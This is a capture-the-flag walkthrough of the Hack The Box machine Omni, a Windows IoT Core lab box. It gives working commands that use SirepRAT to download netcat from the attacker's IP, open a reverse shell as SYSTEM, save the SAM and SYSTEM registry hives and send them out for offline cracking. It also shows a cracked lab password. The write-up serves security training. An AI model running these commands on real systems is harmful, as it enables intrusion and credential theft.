This post documents the complete walkthrough of Omni, a retired vulnerable VM created by egre55, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
On this post
Background
Omni is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.204 --rate=500
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-08-25 06:31:15 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8080/tcp on 10.10.10.204
Discovered open port 29820/tcp on 10.10.10.204
Discovered open port 29819/tcp on 10.10.10.204
Discovered open port 29817/tcp on 10.10.10.204
Discovered open port 5985/tcp on 10.10.10.204
Discovered open port 135/tcp on 10.10.10.204
Interesting list of open ports. Let’s do one better with nmap
scanning the discovered ports to establish their services.
# nmap -n -v -Pn -p135,5985,8080,29817,29819,29820 -A --reason 10.10.10.204 -oN nmap.txt
...
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
5985/tcp open upnp syn-ack ttl 127 Microsoft IIS httpd
8080/tcp open upnp syn-ack ttl 127 Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown syn-ack ttl 127
29819/tcp open arcserve syn-ack ttl 127 ARCserve Discovery
29820/tcp open unknown syn-ack ttl 127
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=8/25%Time=5F44B97B%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Looks like we have a Windows IoT Core device on hand from the looks of Windows Device Portal!
Foothold
But hold up, what’s 29820/tcp
? Google for “windows iot core 29820” led me to SirepRat.
SirepRAT - RCE as SYSTEM on Windows IoT Core
Using SirepRAT, I was able to transfer nc64.exe
(renamed to cute.exe
) to the device, with the intention of running a reverse shell back to me.
# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "powershell.exe" --args "iwr http://10.10.14.25/nc64.exe -outf \\cute.exe" --v
Run nc64.exe
like so.
# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "cmd.exe" --args "/c start \\cute.exe 10.10.14.25 1234 -e cmd.exe" --v
And we have shell, as NT AUTHORITY\SYSTEM no less!
Protected by DPAPI
Finding the location of user.txt
is simple.
However, this is not your usual user.txt
.
The flag is protected by DPAPI, which means I have to get a shell as app
in order to decrypt it. More on that later…
Dumping SAMS
Since we have superuser privileges, it’s trivial to dump SAMS. Save the hives as files like so.
C:\>reg save hklm\sams SAMS
C:\>reg save hklm\system SYSTEM
I’ll use nc64.exe
(renamed as cute.exe
) to transfer the files over to my machine for offline cracking with John the Ripper.
On the remote machine, run the following command.
C:\cute.exe 10.10.14.25 8888 < SAMS
On your machine, run the following command.
# nc -lnvp 8888 > SAMS
Do likewise for SYSTEM
. Once you have SAMS and SYSTEM on your machine, dump the NTHASH with Impacket’s secretsdump.py
.
John the Ripper
We have app
’s password (mesh5143
).
Windows Device Portal
Armed with app
’s password, we can finally explore what’s inside Windows Device Portal.
Turns out we can run commands as app
, which means we’ll be getting a shell as app
!
And here we go…
Decrypting user.txt
I got all the information about decrypting PSCredential objects from here. The key to displaying the encrypted strings is the Import-CliXml
cmdlet. Here’s how.
That’s it. It is this simple.
Privilege Escalation
While we are it, here’s the administrator
’s password, protected by DPAPI.
Of course it has something to do with Internet of Things.
Getting root.txt
Getting a shell as administrator
is similar. Run a command from Windows Device Portal. With the administrator
shell, we can decrypt root.txt
like so.